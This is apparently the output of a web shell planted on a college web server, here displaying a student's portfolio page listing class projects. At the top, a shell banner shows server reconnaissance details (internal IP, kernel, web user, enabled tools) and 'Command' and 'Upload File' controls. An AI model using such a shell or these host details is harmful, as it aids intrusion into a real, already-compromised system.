Server IP : 172.16.15.8 / Your IP : 3.138.135.201 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vnlaughlin/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <title>Victoria's Page</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script> <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script> </head> <div class="container"> <body> <nav class="navbar navbar-inverse" style="background-color: ;"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="index.html">Victoria's Page</a> </div> <ul class="nav navbar-nav"> <li><a href="index.html">Home</a></li> <li><a href="hm_cs480.html">CS480</a></li> <li class="active"><a href="hm_project.html">Projects</a></li> <li><a href="hm_contact.html">Contact</a></li> </ul> </div> </nav> <div class="jumbotron"> <h1>The Marlin Chronicle Website</h1> <p><a href="http://marlinchronicle.vwc.edu/">Homepage</a></li>: Uses a modified WordPress theme to create the Marlin Chronicle's webpage. </div> <div class="jumbotron"> <h1>ASIANetwork Project</h1> <p><a href="asian_network/index.php">Project Homepage</a></li>: This is meant to supplement a project by a team of students and professors at Virginia Wesleyan College. The project is funded by ASIANetwork and is a part of the Student-Faculty Fellows Program. Part of our proposal included a collection of media gathered during a three week excursion to various world heritage sites in Shanxi Province, China. So far, it is a few picture galleries and a way to upload media. <p>More information can be found<a href="http://www.asianetwork.org/2016/02/2016-student-faculty-fellows-program-virginia-wesleyan-college/"> here.</a></p> </div> <div class="jumbotron"> <h1>IDEArena</h1> <p><a href="idearena/index.php">Project Homepage</a></li>: My goal for this project is to create a social media debate platform where people can discuss ideas while immersing themselves with the opposing side. These ideas can include anything from entertainment to educational topics.<p> <a href="idearena/readme.html">Read Me</a></li> </div> <div class="jumbotron"> <h1>CS480 Project</h1> <p><a href="landmarked/homepage/lm_home.php">Project Homepage</a></li>: Land-Marked serves as a social media type website that provides users with the ability to post pictures of their experiences of various landmarks. The goal is to allow others to share their experiences of a landmark in both visual and text format. <p> <a href="landmarked/homepage/Land-Marked Report.docx">Report</a></li> </div> </div> </body> </html>